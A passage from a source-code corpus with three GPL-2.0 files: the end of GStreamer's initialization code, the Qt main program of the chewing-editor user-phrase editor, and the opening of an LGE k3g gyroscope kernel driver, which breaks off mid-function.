  g_type_class_unref (g_type_class_peek (gst_tag_merge_mode_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_tag_flag_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_task_state_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_alloc_trace_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_type_find_probability_get_type
          ()));
  g_type_class_unref (g_type_class_peek (gst_uri_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_parse_error_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_param_spec_fraction_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_progress_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_caps_intersect_mode_get_type ()));

  gst_deinitialized = TRUE;
  GST_INFO ("deinitialized GStreamer");
}
/**
* gst_version:
* @major: (out): pointer to a guint to store the major version number
* @minor: (out): pointer to a guint to store the minor version number
* @micro: (out): pointer to a guint to store the micro version number
* @nano: (out): pointer to a guint to store the nano version number
*
* Gets the version number of the GStreamer library.
*/
void
gst_version (guint * major, guint * minor, guint * micro, guint * nano)
{
  /* All four out-parameters are mandatory; bail out with a warning if
   * any of them is NULL. */
  g_return_if_fail (major);
  g_return_if_fail (minor);
  g_return_if_fail (micro);
  g_return_if_fail (nano);

  /* Fill in the compile-time version constants of this library build. */
  *nano = GST_VERSION_NANO;
  *micro = GST_VERSION_MICRO;
  *minor = GST_VERSION_MINOR;
  *major = GST_VERSION_MAJOR;
}
/**
* gst_version_string:
*
* This function returns a string that is useful for describing this version
* of GStreamer to the outside world: user agent strings, logging, ...
*
* Returns: (transfer full): a newly allocated string describing this version
* of GStreamer.
*/
/* Returns a newly allocated human-readable version string such as
 * "GStreamer 0.10.36", with a "(GIT)" suffix for nano == 1 and
 * "(prerelease)" for any other non-zero nano. Caller owns the string.
 *
 * Fix: the second argument separator had been mangled into the literal
 * character 'µ' (an HTML-entity corruption of "&micro,"), which is not
 * valid C; restored the address-of operator on 'micro'. */
gchar *
gst_version_string (void)
{
  guint major, minor, micro, nano;

  gst_version (&major, &minor, &micro, &nano);
  if (nano == 0)
    return g_strdup_printf ("GStreamer %d.%d.%d", major, minor, micro);
  else if (nano == 1)
    return g_strdup_printf ("GStreamer %d.%d.%d (GIT)", major, minor, micro);
  else
    return g_strdup_printf ("GStreamer %d.%d.%d (prerelease)", major, minor,
        micro);
}
/**
* gst_segtrap_is_enabled:
*
* Some functions in the GStreamer core might install a custom SIGSEGV handler
* to better catch and report errors to the application. Currently this feature
* is enabled by default when loading plugins.
*
* Applications might want to disable this behaviour with the
* gst_segtrap_set_enabled() function. This is typically done if the application
* wants to install its own handler without GStreamer interfering.
*
* Returns: %TRUE if GStreamer is allowed to install a custom SIGSEGV handler.
*
* Since: 0.10.10
*/
gboolean
gst_segtrap_is_enabled (void)
{
/* yeps, it's enabled when it's not disabled */
return !_gst_disable_segtrap;
}
/**
* gst_segtrap_set_enabled:
* @enabled: whether a custom SIGSEGV handler should be installed.
*
* Applications might want to disable/enable the SIGSEGV handling of
* the GStreamer core. See gst_segtrap_is_enabled() for more information.
*
* Since: 0.10.10
*/
void
gst_segtrap_set_enabled (gboolean enabled)
{
  /* Invert: the internal flag records whether the handler is disabled. */
  _gst_disable_segtrap = enabled ? FALSE : TRUE;
}
| gpl-2.0 |
jeffreyhc/chewing-editor | src/main.cpp | 4 | 5330 | /*
* chewing-editor: Chewing userphrase editor
* Copyright (C) 2014 Chewing Development Team
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#include "config.h"
#include <QApplication>
#include <QDebug>
#include <QLibraryInfo>
#include <QTranslator>
#ifdef _MSC_VER
#include <QtPlugin>
Q_IMPORT_PLUGIN(QWindowsIntegrationPlugin)
#endif
#include "ChewingEditor.h"
// Shared backend for the installed Qt message handlers: prints every
// message whose severity is at least `level`, tagged with the severity
// name and the originating function/file/line. Fatal messages abort.
void messageHandlerHelper(QtMsgType type, const QMessageLogContext& context, const QString& message, QtMsgType level)
{
    // Filter out anything below the configured threshold.
    if (type < level) {
        return;
    }

    const QByteArray msg = message.toUtf8();
    const QByteArray file = QFileInfo{context.file}.fileName().toUtf8();

    const char *label = nullptr;
    FILE *stream = stderr;
    bool fatal = false;

    switch (type) {
    case QtDebugMsg:
        label = "Debug";
        stream = stdout; // debug chatter goes to stdout, everything else to stderr
        break;
    case QtWarningMsg:
        label = "Warning";
        break;
    case QtCriticalMsg:
        label = "Critical";
        break;
    case QtFatalMsg:
        label = "Fatal";
        fatal = true;
        break;
    default:
        break;
    }

    if (label) {
        fprintf(stream, "%s: %s (%s %s:%d)\n", label, msg.constData(), context.function, file.constData(), context.line);
    }
    if (fatal) {
        abort();
    }
}
// Default handler: suppress debug output, show warnings and above.
void emptyMessageHandler(QtMsgType type, const QMessageLogContext& context, const QString& message)
{
    messageHandlerHelper(type, context, message, QtWarningMsg);
}
// Verbose handler installed by --debug: show everything, debug included.
void debugMessageHandler(QtMsgType type, const QMessageLogContext& context, const QString& message)
{
    messageHandlerHelper(type, context, message, QtDebugMsg);
}
// Install two translators on the application: Qt's own catalogue for the
// current system locale, and this project's catalogue from the resource
// bundle. Load failures are logged but non-fatal (UI falls back to English).
void loadTranslation(QApplication &app, QTranslator &qtTranslator, QTranslator &chewingTranslator)
{
    const QString locale = QLocale::system().name();

    QString qtFileName{"qt_" + locale};
    QString qtDirectory{QLibraryInfo::location(QLibraryInfo::TranslationsPath)};
    const bool qtLoaded = qtTranslator.load(qtFileName, qtDirectory);
    qDebug() << "Load" << qtFileName << qtDirectory << qtLoaded;
    app.installTranslator(&qtTranslator);

    QString chewingFileName{":/" PROJECT_NAME "_" + locale};
    const bool chewingLoaded = chewingTranslator.load(chewingFileName);
    qDebug() << "Load" << chewingFileName << chewingLoaded;
    app.installTranslator(&chewingTranslator);
}
void printVersion()
{
QString msg{QCoreApplication::translate("main", "%1\n")
.arg(PROJECT_VERSION)};
printf("%s", msg.toUtf8().constData());
}
void printArg(const QString &arg, const QString &description)
{
printf("%s\n\t%s\n\n", arg.toUtf8().constData(), description.toUtf8().constData());
}
// Print the program description followed by the supported options.
// NOTE(review): the `name` parameter is currently unused — presumably
// intended for a "usage: <name> ..." line; confirm before removing.
void printHelp(const QString &name)
{
    const QString description = QCoreApplication::translate("main",
        "chewing-editor is a cross platform chewing user phrase editor written "
        "in Qt5. It provides a user friendly GUI to manage user phrase. With it,"
        " user can customize user phrase to enhance chewing input performance.");
    printf("%s\n\n", description.toUtf8().constData());

    printArg(
        QCoreApplication::translate("main", "-d, --debug"),
        QCoreApplication::translate("main", "Enable debug message."));
    printArg(
        QCoreApplication::translate("main", "-v, --version"),
        QCoreApplication::translate("main", "Print program version."));
    printArg(
        QCoreApplication::translate("main", "-h, --help"),
        QCoreApplication::translate("main", "Print help message."));
}
void printUnknownArgs(const QString &unknown)
{
printf("Unknown options: %s\n", unknown.toUtf8().constData());
}
// Parse the process command line. --debug switches to the verbose message
// handler; --version and --help print and exit(0); anything unrecognized
// prints an error plus the help text and exit(1).
void readArgument(QApplication &app)
{
    const QStringList args = QCoreApplication::arguments();
    const QString name = QFileInfo{args.at(0)}.fileName();

    for (int idx = 1; idx < args.size(); ++idx) {
        const QString &option = args.at(idx);

        if (option == "-d" || option == "--debug") {
            qInstallMessageHandler(debugMessageHandler);
        } else if (option == "-v" || option == "--version") {
            printVersion();
            exit(0);
        } else if (option == "-h" || option == "--help") {
            printHelp(name);
            exit(0);
        } else {
            printUnknownArgs(option);
            printHelp(name);
            exit(1);
        }
    }
}
int main(int argc, char *argv[])
{
    // Install the quiet handler first so early Qt chatter is filtered;
    // readArgument() may later swap in the verbose one for --debug.
    qInstallMessageHandler(emptyMessageHandler);

    QApplication app{argc, argv};

    // Translators must outlive the app's event loop, hence stack-scoped here.
    QTranslator qtTranslator;
    QTranslator chewingTranslator;
    loadTranslation(app, qtTranslator, chewingTranslator);

    readArgument(app);

    ChewingEditor w;
    w.show();
    return app.exec();
}
| gpl-2.0 |
sxwzhw/iproj | lge/com_device/input/k3g.c | 4 | 38869 | /*
* Copyright (C) 2011 LGE, Inc.
*
* * This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
*/
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/i2c.h>
#include <linux/uaccess.h>
#include <linux/poll.h>
#include <linux/slab.h>
#include <linux/input.h>
#include <linux/interrupt.h>
#include <linux/miscdevice.h>
#include <asm/div64.h>
#include <linux/delay.h>
#include <board_lge.h>
#define FILE_OPS
/* k3g chip id */
#define DEVICE_ID 0xD3
/* k3g gyroscope registers */
#define WHO_AM_I 0x0F
#define CTRL_REG1 0x20 /* power control reg */
#define CTRL_REG2 0x21 /* power control reg */
#define CTRL_REG3 0x22 /* power control reg */
#define CTRL_REG4 0x23 /* interrupt control reg */
#define CTRL_REG5 0x24 /* interrupt control reg */
#define OUT_TEMP 0x26 /* Temperature data */
#define STATUS_REG 0x27
#define AXISDATA_REG 0x28
#define OUT_Y_L 0x2A
#define FIFO_CTRL_REG 0x2E
#define FIFO_SRC_REG 0x2F
#define PM_OFF 0x00
#define PM_NORMAL 0x08
#define ENABLE_ALL_AXES 0x07
#define BYPASS_MODE 0x00
#define FIFO_MODE 0x20
#define FIFO_EMPTY 0x20
#define FSS_MASK 0x1F
#define ODR_MASK 0xF0
#define ODR105_BW12_5 0x00 /* ODR = 105Hz; BW = 12.5Hz */
#define ODR105_BW25 0x10 /* ODR = 105Hz; BW = 25Hz */
#define ODR210_BW12_5 0x40 /* ODR = 210Hz; BW = 12.5Hz */
#define ODR210_BW25 0x50 /* ODR = 210Hz; BW = 25Hz */
#define ODR210_BW50 0x60 /* ODR = 210Hz; BW = 50Hz */
#define ODR210_BW70 0x70 /* ODR = 210Hz; BW = 70Hz */
#define ODR420_BW20 0x80 /* ODR = 420Hz; BW = 20Hz */
#define ODR420_BW25 0x90 /* ODR = 420Hz; BW = 25Hz */
#define ODR420_BW50 0xA0 /* ODR = 420Hz; BW = 50Hz */
#define ODR420_BW110 0xB0 /* ODR = 420Hz; BW = 110Hz */
#define ODR840_BW30 0xC0 /* ODR = 840Hz; BW = 30Hz */
#define ODR840_BW35 0xD0 /* ODR = 840Hz; BW = 35Hz */
#define ODR840_BW50 0xE0 /* ODR = 840Hz; BW = 50Hz */
#define ODR840_BW110 0xF0 /* ODR = 840Hz; BW = 110Hz */
#define MIN_ST 175
#define MAX_ST 875
#define AC (1 << 7) /* register auto-increment bit */
#define MAX_ENTRY 1
#define MAX_DELAY (MAX_ENTRY * 9523809LL)
#define SELF_TEST_ENABLED
#ifdef SELF_TEST_ENABLED
#define TAG_ST "k3g_self_test"
#define ZYXDA_MASK 0x08
#define OUT_X_L 0x28 /* X-axis acceleration data */
#define OUT_X_H 0x29
#define OUT_Y_H 0x2B
#define OUT_Z_L 0x2C /* Z-axis acceleration data */
#define OUT_Z_H 0x2D
#define SENSITIVITY 70 /*70 for 2000dps, 17.50 for 500dps, 8.75dps for 250dps */
#define MIN_ST_X 175
#define MAX_ST_X 875
#define MIN_ST_Y MIN_ST_X
#define MAX_ST_Y MAX_ST_X
#define MIN_ST_Z MIN_ST_X
#define MAX_ST_Z MAX_ST_X
#endif
#define DRV_NAME "k3g"
/* LGE Debug mask value
* usage: echo [mask_value] > /sys/module/k3dh/parameters/debug_mask
* All : 127
* No msg : 0
* default : 2
*/
/* Bit flags for the debug_mask module parameter; combine to select which
 * categories of printk output the driver emits. */
enum {
	DEBUG_ERR_CHECK = 1U << 0,	/* error-path checks */
	DEBUG_USER_ERROR = 1U << 1,	/* userspace misuse (default) */
	DEBUG_FUNC_TRACE = 1U << 2,	/* function entry tracing */
	DEBUG_DEV_STATUS = 1U << 3,	/* device/FIFO status dumps */
	DEBUG_DEV_DEBOUNCE = 1U << 4,	/* per-sample x/y/z values */
	DEBUG_GEN_INFO = 1U << 5,	/* general information */
	DEBUG_INTR_INFO = 1U << 6,	/* interrupt-path information */
	DEBUG_DEBUG_SYSFS = 1U << 7,	/* sysfs show/store tracing */
};
/* Runtime-tunable verbosity bitmask (see DEBUG_* flags above); exposed as
 * /sys/module/.../parameters/debug_mask, readable by all, writable by
 * owner/group. */
static unsigned int debug_mask = DEBUG_USER_ERROR;
module_param_named(debug_mask, debug_mask, int,
		   S_IRUGO | S_IWUSR | S_IWGRP);
/* default register setting for device init;
 * index i is written to CTRL_REG1 + i in one block transfer */
static const char default_ctrl_regs[] = {
	0x3F,		/* 105HZ, PM-normal, xyz enable */
	0x00,		/* normal mode */
	0x04,		/* fifo wtm interrupt on */
	0xA0,		/* block data update, 2000d/s */
	0x40,		/* fifo enable */
};
/* Supported output data rates, fastest first; k3g_set_delay() picks the
 * first entry whose period is >= the requested delay. */
static const struct odr_delay {
	u8 odr;			/* odr reg setting */
	u32 delay_ns;		/* odr in ns */
} odr_delay_table[] = {
	{  ODR840_BW110, 1190476LL }, /* 840Hz */
	{  ODR420_BW110, 2380952LL }, /* 420Hz */
	{  ODR210_BW70,  4761904LL }, /* 210Hz */
	{  ODR105_BW25,  9523809LL }, /* 105Hz */
};
/*
* K3G gyroscope data
* brief structure containing gyroscope values for yaw, pitch and roll in
* signed short
*/
/* One angular-rate sample: raw signed 16-bit readings per axis. */
struct k3g_t {
	s16 x;
	s16 y;
	s16 z;
};
/* Per-device driver state; lock guards enable/rate changes against the
 * polling work and interrupt paths. */
struct k3g_data {
	struct i2c_client *client;
	struct input_dev *input_dev;
	struct mutex lock;
	struct workqueue_struct *k3g_wq;	/* private workqueue for polling */
	struct work_struct work;
	struct hrtimer timer;			/* schedules the next poll */
	bool enable;
	bool drop_next_event;	/* set when FIFO was empty; skip stale sample */
	bool interruptible;	/* interrupt or polling? */
	int entries;		/* number of fifo entries */
	u8 ctrl_regs[5];	/* saving register settings */
	u32 time_to_read;	/* time needed to read one entry */
	ktime_t polling_delay;	/* polling time for timer */
};
/* Cached i2c client so sysfs handlers can reach the platform data. */
static struct i2c_client *k3g_i2c_client = NULL;
#ifdef FILE_OPS
#define K3G_IOCTL_BASE 80
/** The following define the IOCTL command values via the ioctl macros */
#define K3G_IOCTL_READ_DATA_XYZ _IOW(K3G_IOCTL_BASE, 0, int)
/* Latest x/y/z sample, exported via the misc-device ioctl and sysfs. */
static int k3g_gyro_data[3];
#endif
/* Samples reported since the device was last enabled (diagnostics). */
static u32 report_cnt = 0;
/* Read FIFO_SRC_REG and return the number of samples available in the
 * FIFO (stored-sample count plus one unless the FIFO-empty flag is set),
 * or a negative errno on i2c failure.
 *
 * Fix: the raw register value is now checked for an i2c error *before*
 * it is compared against k3g_data->entries and logged — previously a
 * negative errno was treated as a (spuriously low) fifo level in the
 * debug printk. */
static int k3g_read_fifo_status(struct k3g_data *k3g_data)
{
	int fifo_status;

	fifo_status = i2c_smbus_read_byte_data(k3g_data->client, FIFO_SRC_REG);
	if (fifo_status < 0) {
		pr_err("%s: failed to read fifo source register\n", __func__);
		return fifo_status;
	}

	if (DEBUG_DEV_STATUS & debug_mask || fifo_status < k3g_data->entries)
		printk(KERN_ERR "[k3g] #### fifo_status=%d, entries=%d\n", fifo_status, k3g_data->entries);

	return (fifo_status & FSS_MASK) + !(fifo_status & FIFO_EMPTY);
}
/* Flush and re-arm the hardware FIFO: drop to bypass mode to clear it,
 * then switch back to FIFO mode with a watermark of (entries - 1).
 * Returns 0 on success or a negative errno. */
static int k3g_restart_fifo(struct k3g_data *k3g_data)
{
	int err;

	if (DEBUG_FUNC_TRACE & debug_mask)
		printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);

	err = i2c_smbus_write_byte_data(k3g_data->client,
					FIFO_CTRL_REG, BYPASS_MODE);
	if (err < 0) {
		pr_err("%s : failed to set bypass_mode\n", __func__);
		return err;
	}

	err = i2c_smbus_write_byte_data(k3g_data->client,
					FIFO_CTRL_REG,
					FIFO_MODE | (k3g_data->entries - 1));
	if (err < 0)
		pr_err("%s : failed to set fifo_mode\n", __func__);

	return err;
}
/* Compute the next hrtimer period: time for the samples still missing
 * from the FIFO ((entries + 1 - res) slots, clamped at zero) at the
 * current per-sample read time. */
static void set_polling_delay(struct k3g_data *k3g_data, int res)
{
	s64 remaining;

	if (DEBUG_FUNC_TRACE & debug_mask)
		printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);

	remaining = k3g_data->entries + 1 - res;
	if (remaining < 0)
		remaining = 0;

	remaining = remaining * k3g_data->time_to_read;
	k3g_data->polling_delay = ns_to_ktime(remaining);
}
/* gyroscope data readout
 *
 * Drain up to total_read samples from the FIFO (bulk read of all but the
 * last, then a one-byte read, then the final sample via OUT_Y_L with
 * auto-increment), remap axes per the platform data and store the result
 * in *data. Returns 0 on success or a negative errno.
 *
 * Fix: "msg[0].buf = ®_buf" was an HTML-entity corruption of
 * "&reg_buf" (the '®' character is the decoded form of "&reg;") and does
 * not compile; restored the address-of expression. */
static int k3g_read_gyro_values(struct i2c_client *client,
				struct k3g_t *data, int total_read)
{
	int err;
	struct i2c_msg msg[2];
	u8 reg_buf;
	/* bulk-read length: all samples except the final one */
	int len = sizeof(*data) * (total_read ? (total_read - 1) : 1);
	u8 gyro_data[sizeof(struct k3g_t) * 32];
	struct k3g_platform_data *pdata;
	s16 tmp_xyz[3];

	pdata = client->dev.platform_data;
	if (pdata == NULL) {
		dev_err(&client->dev, "failed to read platform data\n");
		err = -ENODEV;
		return err;
	}

	/* msg[0] writes the register address, msg[1] reads the data */
	msg[0].addr = client->addr;
	msg[0].buf = &reg_buf;
	msg[0].flags = 0;
	msg[0].len = 1;
	msg[1].addr = client->addr;
	msg[1].flags = I2C_M_RD;
	msg[1].buf = gyro_data;

	if (total_read > 1) {
		/* drain the older FIFO entries in one auto-increment burst */
		reg_buf = AXISDATA_REG | AC;
		msg[1].len = len;
		err = i2c_transfer(client->adapter, msg, 2);
		if (err != 2)
			return (err < 0) ? err : -EIO;
	}

	reg_buf = AXISDATA_REG;
	msg[1].len = 1;
	err = i2c_transfer(client->adapter, msg, 2);
	if (err != 2)
		return (err < 0) ? err : -EIO;

	/* read the newest sample starting at OUT_Y_L with auto-increment */
	reg_buf = OUT_Y_L | AC;
	msg[1].len = sizeof(*data);
	err = i2c_transfer(client->adapter, msg, 2);
	if (err != 2)
		return (err < 0) ? err : -EIO;

	tmp_xyz[1] = (gyro_data[1] << 8) | gyro_data[0];
	tmp_xyz[2] = (gyro_data[3] << 8) | gyro_data[2];
	tmp_xyz[0] = (gyro_data[5] << 8) | gyro_data[4];

	/* board-specific axis remap/negation from platform data */
	data->y = (pdata->negate_y) ? (-tmp_xyz[pdata->axis_map_y]) : (tmp_xyz[pdata->axis_map_y]);
	data->z = (pdata->negate_z) ? (-tmp_xyz[pdata->axis_map_z]) : (tmp_xyz[pdata->axis_map_z]);
	data->x = (pdata->negate_x) ? (-tmp_xyz[pdata->axis_map_x]) : (tmp_xyz[pdata->axis_map_x]);

	return 0;
}
/* Read one remapped sample from the FIFO, publish it (input events or,
 * under sensor fusion, the k3g_gyro_data cache) and return the remaining
 * FIFO level, a negative errno, or the result of a FIFO restart if the
 * FIFO was close to overflowing. */
static int k3g_report_gyro_values(struct k3g_data *k3g_data)
{
	int res;
	struct k3g_t data;

	if (DEBUG_FUNC_TRACE & debug_mask)
		printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);

	/* drop_next_event adds one extra read to discard a stale sample */
	res = k3g_read_gyro_values(k3g_data->client, &data,
				   k3g_data->entries + k3g_data->drop_next_event);
	if (res < 0)
		return res;

	res = k3g_read_fifo_status(k3g_data);
	if (DEBUG_DEV_STATUS & debug_mask)
		printk(KERN_INFO "[k3g] read_fifo_status(%d)\n", res);

	/* empty FIFO now -> next sample may be stale, discard it then */
	k3g_data->drop_next_event = !res;

	if (DEBUG_DEV_STATUS & debug_mask)
		printk(KERN_INFO "[k3g] entries=%d\n", k3g_data->entries);

	if (res >= 31 - k3g_data->entries) {
		/* reset fifo to start again - data isn't trustworthy,
		 * our locked read might not have worked and we
		 * could have done i2c read in mid register update
		 */
		if (DEBUG_DEV_STATUS & debug_mask)
			printk(KERN_INFO "[k3g] call restart_fifo, entries=%d\n", k3g_data->entries);
		return k3g_restart_fifo(k3g_data);
	}

#ifndef CONFIG_LGE_SENSOR_FUSION
	/* deliver via the input subsystem as relative rotation events */
	input_report_rel(k3g_data->input_dev, REL_RX, data.x);
	input_report_rel(k3g_data->input_dev, REL_RY, data.y);
	input_report_rel(k3g_data->input_dev, REL_RZ, data.z);
	input_sync(k3g_data->input_dev);
#else
	/* fusion build: cache the sample for the ioctl/sysfs readers */
	k3g_gyro_data[0] = (int) data.x;
	k3g_gyro_data[1] = (int) data.y;
	k3g_gyro_data[2] = (int) data.z;
#endif

	if (DEBUG_DEV_DEBOUNCE & debug_mask)
		printk(KERN_INFO "%s: [k3g] x(%d), y(%d), z(%d)\n", __func__, data.x, data.y, data.z);

	report_cnt++;
	return res;
}
/* Polling-mode hrtimer callback: defer the (sleeping) i2c work to the
 * private workqueue; the work re-arms the timer itself. */
static enum hrtimer_restart k3g_timer_func(struct hrtimer *timer)
{
	struct k3g_data *data = container_of(timer, struct k3g_data, timer);

	if (DEBUG_FUNC_TRACE & debug_mask)
		printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);

	queue_work(data->k3g_wq, &data->work);
	return HRTIMER_NORESTART;
}
/* Polling-mode worker: wait for the FIFO to hold a full batch, report it,
 * then compute the next polling delay; loops immediately while the
 * computed delay is zero, otherwise re-arms the hrtimer. */
static void k3g_work_func(struct work_struct *work)
{
	int res;
	struct k3g_data *k3g_data = container_of(work, struct k3g_data, work);

	if (DEBUG_FUNC_TRACE & debug_mask)
		printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);

	/* device was disabled after this work was queued; nothing to do */
	if (k3g_data->enable == 0) {
		return;
	}

	do {
		res = k3g_read_fifo_status(k3g_data);
		if (res < 0)
			return;

		if (res < k3g_data->entries) {
			/* batch not complete yet; just reschedule */
			pr_warn("%s: fifo entries are less than we want\n",
				__func__);
			goto timer_set;
		}

		res = k3g_report_gyro_values(k3g_data);
		if (res < 0)
			return;
timer_set:
		set_polling_delay(k3g_data, res);

	/* zero delay means data should already be ready: poll again now */
	} while (!ktime_to_ns(k3g_data->polling_delay));

	hrtimer_start(&k3g_data->timer,
		      k3g_data->polling_delay, HRTIMER_MODE_REL);
}
/* Threaded IRQ handler (FIFO watermark): read and publish the batch.
 * Errors are logged but the IRQ is always acknowledged as handled. */
static irqreturn_t k3g_interrupt_thread(int irq, void *k3g_data_p)
{
	struct k3g_data *data = k3g_data_p;
	int err;

	if (DEBUG_FUNC_TRACE & debug_mask)
		printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);

	err = k3g_report_gyro_values(data);
	if (err < 0) {
		pr_err("%s: failed to report gyro values\n", __func__);
	}

	return IRQ_HANDLED;
}
/* sysfs read of the enable attribute: "1\n" when active, "0\n" otherwise. */
static ssize_t k3g_show_enable(struct device *dev,
			       struct device_attribute *attr, char *buf)
{
	struct k3g_data *data = dev_get_drvdata(dev);

	if (DEBUG_DEBUG_SYSFS & debug_mask)
		printk(KERN_INFO "%s: enable(%d)\n", __func__, data->enable);

	return sprintf(buf, "%d\n", data->enable);
}
/* sysfs write of the enable attribute ("1"/"0"). Enabling powers the
 * sensor, restores the saved control registers, resets the FIFO and
 * starts either the IRQ or the polling timer; disabling tears that down
 * and powers the register block off. Returns the write size on success
 * or a negative errno. */
static ssize_t k3g_set_enable(struct device *dev,
			      struct device_attribute *attr, const char *buf, size_t size)
{
	int err = 0;
	struct k3g_platform_data *pdata;
	bool new_enable;
	struct k3g_data *k3g_data = dev_get_drvdata(dev);
	struct i2c_client *client = to_i2c_client(dev);

	/* platform data comes from the cached probe-time client */
	pdata = k3g_i2c_client->dev.platform_data;
	if (pdata == NULL) {
		dev_err(&client->dev, "failed to read platform data\n");
		err = -ENODEV;
		return err;
	}

	if (DEBUG_FUNC_TRACE & debug_mask)
		printk(KERN_INFO "%s: line %d - enable %s\n", __func__, __LINE__, buf);

	/* only the exact strings "1" and "0" are accepted */
	if (sysfs_streq(buf, "1")) {
		new_enable = true;
		if (DEBUG_FUNC_TRACE & debug_mask || DEBUG_DEBUG_SYSFS & debug_mask)
			printk(KERN_INFO "%s: line %d - enable\n", __func__, __LINE__);
	} else if (sysfs_streq(buf, "0")) {
		new_enable = false;
		if (DEBUG_FUNC_TRACE & debug_mask || DEBUG_DEBUG_SYSFS & debug_mask)
			printk(KERN_INFO "%s: line %d - disable\n", __func__, __LINE__);
	} else {
		pr_debug("%s: invalid value %d\n", __func__, *buf);
		return -EINVAL;
	}

	/* no state change requested: succeed without touching hardware */
	if (new_enable == k3g_data->enable) {
		return size;
	}

	mutex_lock(&k3g_data->lock);
	if (new_enable) {
		if (pdata->power_on) {
			if (DEBUG_FUNC_TRACE & debug_mask)
				printk(KERN_INFO "%s: line %d, call power_on", __func__, __LINE__);
			pdata->power_on(1 << SENSOR_TYPE_GYROSCOPE);
			mdelay(1);
		}
		/* turning on: restore all five saved control registers in
		 * one auto-increment block write */
		err = i2c_smbus_write_i2c_block_data(k3g_data->client,
						     CTRL_REG1 | AC, sizeof(k3g_data->ctrl_regs),
						     k3g_data->ctrl_regs);
		if (err < 0) {
			err = -EIO;
			if (DEBUG_FUNC_TRACE & debug_mask)
				printk(KERN_INFO "%s: line %d, failed turn on\n", __func__, __LINE__);
			goto unlock;
		}
		/* settle time before the output is trustworthy */
		mdelay(300);

		/* reset fifo entries */
		err = k3g_restart_fifo(k3g_data);
		if (err < 0) {
			err = -EIO;
			goto turn_off;
		}

		if (k3g_data->interruptible) {
			enable_irq(k3g_data->client->irq);
			if (DEBUG_FUNC_TRACE & debug_mask)
				printk(KERN_INFO "%s: line %d, enable interrupt\n", __func__, __LINE__);
		} else {
			set_polling_delay(k3g_data, 0);
			hrtimer_start(&k3g_data->timer,
				      k3g_data->polling_delay, HRTIMER_MODE_REL);
			if (DEBUG_FUNC_TRACE & debug_mask)
				printk(KERN_INFO "%s: line %d, set_polling_delay\n", __func__, __LINE__);
		}
		report_cnt = 0;
	} else {
		if (k3g_data->interruptible) {
			printk(KERN_INFO "%s: line %d -disable_irq\n", __func__, __LINE__);
			disable_irq(k3g_data->client->irq);
		} else {
			printk(KERN_INFO "%s: line %d - cancel timer\n", __func__, __LINE__);
			hrtimer_cancel(&k3g_data->timer);
			cancel_work_sync(&k3g_data->work);
			flush_workqueue(k3g_data->k3g_wq);
		}
		/* turning off */
		err = i2c_smbus_write_byte_data(k3g_data->client,
						CTRL_REG1, 0x00);
		if (err < 0) {
			printk(KERN_INFO "%s: line %d - i2c error\n", __func__, __LINE__);
			goto unlock;
		}
	}
	k3g_data->enable = new_enable;

turn_off:
	/* FIFO restart failed after power-up: power the sensor back down */
	if (err < 0)
		i2c_smbus_write_byte_data(k3g_data->client,
					  CTRL_REG1, 0x00);
unlock:
	mutex_unlock(&k3g_data->lock);
	return err ? err : size;
}
#ifdef FILE_OPS
/* misc-device open: mark the fd non-seekable; no per-fd state is kept. */
static int k3g_misc_open(struct inode *inode, struct file *file)
{
	int err = nonseekable_open(inode, file);

	if (err < 0)
		return err;

	if (DEBUG_FUNC_TRACE & debug_mask)
		printk(KERN_INFO "%s: line:%d", __func__, __LINE__);

	file->private_data = NULL;
	return 0;
}
/* misc-device ioctl: K3G_IOCTL_READ_DATA_XYZ copies the cached x/y/z
 * sample (three ints) to userspace; anything else is -EINVAL. */
static long k3g_misc_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
	void __user *argp = (void __user *)arg;

	if (DEBUG_FUNC_TRACE & debug_mask)
		printk(KERN_INFO "%s: %s call with cmd 0x%x and arg 0x%x\n",
		       DRV_NAME, __func__, cmd, (unsigned int)arg);

	if (cmd != K3G_IOCTL_READ_DATA_XYZ)
		return -EINVAL;

	if (copy_to_user(argp, k3g_gyro_data, sizeof(int) * 3)) {
		printk(KERN_ERR "%s: %s error in copy_to_user \n",
		       DRV_NAME, __func__);
		return -EINVAL;
	}
	return 0;
}
/* File operations for the "/dev/k3g_misc" character device. */
static const struct file_operations k3g_misc_fops = {
	.owner = THIS_MODULE,
	.open = k3g_misc_open,
	.unlocked_ioctl = k3g_misc_ioctl,
};

/* Misc device registration; minor number assigned dynamically. */
static struct miscdevice k3g_misc_device = {
	.minor = MISC_DYNAMIC_MINOR,
	.name = DRV_NAME "_misc",
	.fops = &k3g_misc_fops,
};
#endif
/* sysfs read of the latest gyro sample: "x y z\n", or "-1 -1 -1\n" while
 * the device is disabled.
 *
 * Improvement: format directly into the sysfs page buffer instead of
 * staging through a 256-byte stack buffer and formatting twice; output
 * bytes are unchanged. */
static ssize_t k3g_show_gyro_data(struct device *dev,
				  struct device_attribute *attr, char *buf)
{
	struct k3g_data *k3g_data = dev_get_drvdata(dev);
